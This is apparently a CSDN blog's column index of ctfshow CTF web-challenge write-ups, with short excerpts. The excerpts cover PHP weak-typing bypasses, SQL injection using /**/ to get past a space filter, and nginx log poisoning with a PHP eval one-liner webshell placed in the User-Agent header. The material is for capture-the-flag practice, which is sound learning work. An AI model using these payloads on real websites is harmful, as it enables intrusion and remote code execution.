![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
ctf show
文章平均质量分 76
许允er
loxzrynve
展开
-
CTFSHOW 年CTF
php的弱类型,用小数点绕过 这里后面直接加字母不行。原创 2023-09-06 15:11:16 · 457 阅读 · 0 评论 -
ctfshow web13-14
ctfshow web13-14文件上传的题想办法搞到源码 常见得到源码的方法 .bak .git .hg这里使用.bak得到源码下载得到源码原创 2021-12-12 14:57:49 · 1061 阅读 · 0 评论 -
ctfshow web10-12
ctfshow web10-12原创 2021-12-09 11:14:23 · 1153 阅读 · 0 评论 -
ctfshow web7-9
web7-9通过点击几个目录发现id在变化可能存在sql注入使用/?id=1 and 1来测试发现出错 尝试找出过滤 最后发现过滤了空格使用/**/来绕过构造/?id=1/**/and/**/1 和/?id=1/**/and/**/0 时sql恒不成立构建 ?id=1/**/and/**/1/**/order/**/by/**/3 来查字段得到字段为3 构建/?id=-1/**/union/**/select/**/1,2,3(由于使用联...原创 2021-12-08 11:28:04 · 316 阅读 · 3 评论 -
ctfshow web4-6
web44和3 都有include 尝试构建和3一样发现失败了想到从网站日志下手日志路径/var/log/nginx/access.log构建/?url=/var/log/nginx/access.log同时burp抓包并转到request中通过一句话木马连接<?php eval($_POST['xuyun'])?>木马放在User-Agent 后面通过蚁剑连接链接:https://pan.baidu.com/s/1...原创 2021-12-07 11:06:28 · 2909 阅读 · 0 评论 -
ctf show web1-3
web1f12查看原创 2021-12-06 18:40:17 · 738 阅读 · 0 评论